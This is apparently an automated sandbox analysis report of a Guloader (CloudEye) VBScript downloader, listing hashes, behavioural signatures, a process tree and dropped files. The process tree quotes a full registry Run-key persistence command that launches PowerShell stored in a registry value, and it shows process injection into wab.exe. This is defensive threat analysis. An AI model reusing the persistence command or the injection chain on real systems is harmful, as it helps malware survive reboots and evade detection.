Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
  • submitted
    03/05/2024, 02:03

General

  • Target

    c950aba2061fbb90b63122bec04b71764966e5554b6cd40114772c392464f748.vbs

  • Size

    210KB

  • MD5

    5c7e4886e009c7d2908ec633bf48cf8e

  • SHA1

    72e9f5c65571b19402febfa7f36fc6ee5ce9a0f3

  • SHA256

    c950aba2061fbb90b63122bec04b71764966e5554b6cd40114772c392464f748

  • SHA512

    e7910dd42402712860ff660e699707d3c0ae6e4ba8eb8292a8a01de8a22a78bd86272f9668ae4fe260c9af499bbc8477d8d8df115a917040606be6c9cb7736f1

  • SSDEEP

    6144:wyJITON4vsj1oLXVAFN6oDpLfcW6PGOYQO+17ezWSUqE19eAV/KE3JSlkiuqIQKi:lcKJkRH3Y

Malware Config

Signatures

  • Guloader, Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request (2 IoCs)
  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  • Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  • Suspicious use of SetThreadContext (2 IoCs)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key (1 TTP, 1 IoC)
  • Runs ping.exe (1 TTP, 2 IoCs)
  • Suspicious behavior: EnumeratesProcesses (11 IoCs)
  • Suspicious behavior: MapViewOfSection (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (41 IoCs)

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1196
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c950aba2061fbb90b63122bec04b71764966e5554b6cd40114772c392464f748.vbs"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\System32\ping.exe
        ping google.com -n 1
        3⤵
        • Runs ping.exe
        PID:2652
      • C:\Windows\System32\ping.exe
        ping %.%.%.%
        3⤵
        • Runs ping.exe
        PID:2528
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c dir
        3⤵
        PID:2608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2564
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
            4⤵
            PID:2520
            • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
              4⤵
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2664
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
                5⤵
                PID:2204
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe"
                  5⤵
                  • Suspicious use of NtCreateThreadExHideFromDebugger
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of WriteProcessMemory
                  PID:2580
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:328
                    • C:\Windows\SysWOW64\reg.exe
                      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
                      7⤵
                      • Adds Run key to start application
                      • Modifies registry key
                      PID:1632
    • C:\Windows\SysWOW64\xcopy.exe
      "C:\Windows\SysWOW64\xcopy.exe"
      2⤵
      PID:1636

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0OYRDYBNDBWF5ANZQ6QJ.temp

    Filesize

    7KB

    MD5

    4c4db2d57128625de9a241f04b517d51

    SHA1

    f2e57269420dc75d751cbdff8a02111d8a1e898a

    SHA256

    e1752c879ed8275e9577a4deb84f0a44381fa5962366576c789fd2d38bc24622

    SHA512

    489e8fa2f37290875c1dae50d269dc6a5065cf25b92e49704458e23ce8c46c125db3c30b8baa33c5d61f47eb9c644064d1441c4941609fde8cce31828ee017fc

  • C:\Users\Admin\AppData\Roaming\Sagsgningerne.Int

    Filesize

    453KB

    MD5

    c7906dd3affb5ab9d5b82f6e14064c4b

    SHA1

    bdc1903a713b8e82e10d1acada68110988885416

    SHA256

    1be80920d652fc9bf4cd1a46eefcded743b7d37b3eed7c13446974119bbd1795

    SHA512

    ab65febd4ec13bc44a818d61585e7c072c2c4c4723e3f469004db860a5135ca3bdd1ac0037938c68d38fda920d59f73332213a3801f104dad17edb82338613b5

  • memory/1196-30-0x0000000003B50000-0x0000000003C50000-memory.dmp

    Filesize

    1024KB

  • memory/2564-21-0x000000001B680000-0x000000001B962000-memory.dmp

    Filesize

    2.9MB

  • memory/2564-22-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

    Filesize

    32KB

  • memory/2580-29-0x0000000000590000-0x0000000005B0E000-memory.dmp

    Filesize

    85.5MB

  • memory/2580-31-0x0000000000590000-0x0000000005B0E000-memory.dmp

    Filesize

    85.5MB

  • memory/2664-28-0x0000000006470000-0x000000000B9EE000-memory.dmp

    Filesize

    85.5MB